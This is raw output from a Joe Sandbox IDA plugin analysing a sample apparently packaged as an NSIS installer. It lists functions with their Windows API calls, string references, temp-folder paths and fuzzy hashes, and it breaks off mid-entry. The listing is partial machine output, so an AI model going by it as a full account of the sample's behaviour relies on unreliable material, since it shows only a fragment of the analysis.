Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(00071C30,00000064,00071C34), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Strings

Calibri, xrefs: 00401DB7

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
C:\Users\user\AppData\Local\Temp\nsuC465.tmp, xrefs: 0040257C

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsuC465.tmp$C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll
API String ID: 3109718747-3798628405
Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D

Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001908
GlobalFree.KERNEL32(?), ref: 10001A93
GlobalFree.KERNEL32(?), ref: 10001A98

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 00405F22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90

Strings

Call, xrefs: 00405F25

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5

Function 00405A09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
